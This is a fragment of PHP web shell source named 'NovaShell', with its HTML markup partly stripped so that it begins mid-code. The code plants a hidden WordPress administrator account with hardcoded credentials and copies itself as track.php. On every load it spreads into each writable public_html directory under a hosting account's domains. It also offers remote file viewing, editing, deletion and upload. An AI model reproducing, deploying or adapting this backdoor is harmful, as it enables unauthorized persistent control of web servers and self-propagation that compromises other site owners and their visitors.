🗑️ Deleted: " . basename($t) . "

"; } } // === WP Admin Creator if (isset($_GET['wp'])) { $wppath = $cwd; while ($wppath !== '/') { if (file_exists("$wppath/wp-load.php")) break; $wppath = dirname($wppath); } if (file_exists("$wppath/wp-load.php")) { require_once("$wppath/wp-load.php"); $user = 'nova'; $pass = 'Nova@2025'; $mail = 'nova@galaxy.com'; if (!username_exists($user) && !email_exists($mail)) { $uid = wp_create_user($user, $pass, $mail); $wp_user = new WP_User($uid); $wp_user->set_role('administrator'); echo "

✅ WP Admin 'nova' created

"; } else { echo "

⚠️ User or email exists

"; } } else { echo "

❌ WP not found

"; } } // === Clone Here Feature if (isset($_GET['clone'])) { $target = "$cwd/track.php"; $source = __FILE__; if (copy($source, $target)) { echo "

🌀 Shell cloned to track.php

"; } else { echo "

❌ Failed to clone shell

"; } } // === Replication logic function replicate($code) { static $once = false; if ($once) return []; $once = true; $start = __DIR__; while ($start !== '/') { if (preg_match('/\/u[\w]+$/', $start) && is_dir("$start/domains")) { $urls = []; foreach (scandir("$start/domains") as $dom) { if ($dom === '.' || $dom === '..') continue; $pub = "$start/domains/$dom/public_html"; if (is_writable($pub)) { $path = "$pub/track.php"; if (file_put_contents($path, $code)) { $urls[] = "http://$dom/track.php"; } } } return $urls; } $start = dirname($start); } return []; } // === Breadcrumbs function nav($p) { $out = "
📂 Path: "; $parts = explode('/', trim($p, '/')); $build = '/'; foreach ($parts as $seg) { $build .= "$seg/"; $out .= "$seg/"; } return $out . "
"; } // === Directory listing function explorer($p) { $items = scandir($p); $dirs = $files = ""; foreach ($items as $i) { if ($i == "." || $i == "..") continue; $full = "$p/$i"; if (is_dir($full)) $dirs .= "
  • 📁 $i [x]
    • "; else $files .= "
  • 📄 $i [✏] [x]
    • "; } return ""; } // === View or Edit if (isset($_GET['v'])) { $f = basename($_GET['v']); echo "

    📄 Viewing: $f

    " . htmlspecialchars(file_get_contents("$cwd/$f")) . "
    "; } if (isset($_GET['e'])) { $f = basename($_GET['e']); $path = "$cwd/$f"; if ($_SERVER['REQUEST_METHOD'] === 'POST') { file_put_contents($path, $_POST['data']); echo "

    ✅ Saved

    "; } $src = htmlspecialchars(file_get_contents($path)); echo "

    ✏️ Edit: $f


    "; } // === Upload or mkdir if ($_FILES) { move_uploaded_file($_FILES['upload']['tmp_name'], "$cwd/" . basename($_FILES['upload']['name'])); echo "

    📤 Uploaded

    "; } if (!empty($_POST['mk'])) { $d = "$cwd/" . basename($_POST['mk']); if (!file_exists($d)) { mkdir($d); echo "

    📁 Created

    "; } else { echo "

    ⚠️ Exists

    "; } } // === UI START echo "🛸 NovaShell

    🛸 NovaShell

    " . nav($cwd) . "
    "; // === WP Admin & Clone Buttons echo "
    "; echo "


    "; // === Replicate if original if (basename(__FILE__) !== 'track.php') { $urls = replicate(file_get_contents(__FILE__)); if (!empty($urls)) { echo "

    ✅ Cloned into:

    "; } } // === Upload & mkdir UI echo "

    📁

    "; echo explorer($cwd); echo ""; ?>